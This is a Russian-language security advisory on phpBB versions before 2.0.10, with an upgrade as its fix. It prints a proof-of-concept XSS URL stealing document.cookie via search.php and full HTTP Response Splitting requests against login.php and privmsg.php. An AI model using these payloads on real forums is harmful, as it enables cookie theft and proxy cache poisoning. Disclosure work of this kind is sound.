Дата публикации: | 21.07.2004 |
Дата изменения: | 20.10.2006 |
Всего просмотров: | 2345 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: phpBB до версии 2.0.10
Описание: Уязвимость в phpBB позволяет удаленному пользователю выполнить XSS нападение. 1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: http://SERVER/phpBB2/search.php?search_author='<script>alert(document.cookie)</script>Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf). Удаленный пользователь может отравить Кеш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129 logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!Еще пример: GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER URL производителя:http://www.phpbb.com/ Решение:Установите последнюю версию программы (2.0.10): http://www.phpbb.com/downloads.php |
|
Ссылки: | PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities |